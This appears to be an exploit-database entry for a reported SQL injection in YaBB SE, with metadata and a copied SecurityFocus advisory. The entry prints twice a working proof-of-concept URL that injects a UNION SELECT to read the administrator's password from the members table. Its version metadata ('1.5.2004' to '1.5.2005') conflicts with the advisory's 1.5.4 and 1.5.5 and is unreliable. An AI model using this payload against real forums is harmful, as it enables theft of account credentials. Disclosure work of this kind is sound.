header-logo
Suggest Exploit
vendor:
YaBB SE
by:
SecurityFocus
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: YaBB SE
Affected Version From: 1.5.2004
Affected Version To: 1.5.2005
Patch Exists: YES
Related CWE: N/A
CPE: a:yabbse:yabbse
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

YaBB SE SQL Injection Vulnerability

It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software. An example of such a query is http://www.example.com/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9674/info

It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software. 

YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this issue, however, other versions could be affected as well.

http://www.example.com/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,nul
l,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

Navigation

Suggest Exploit

Services By CQR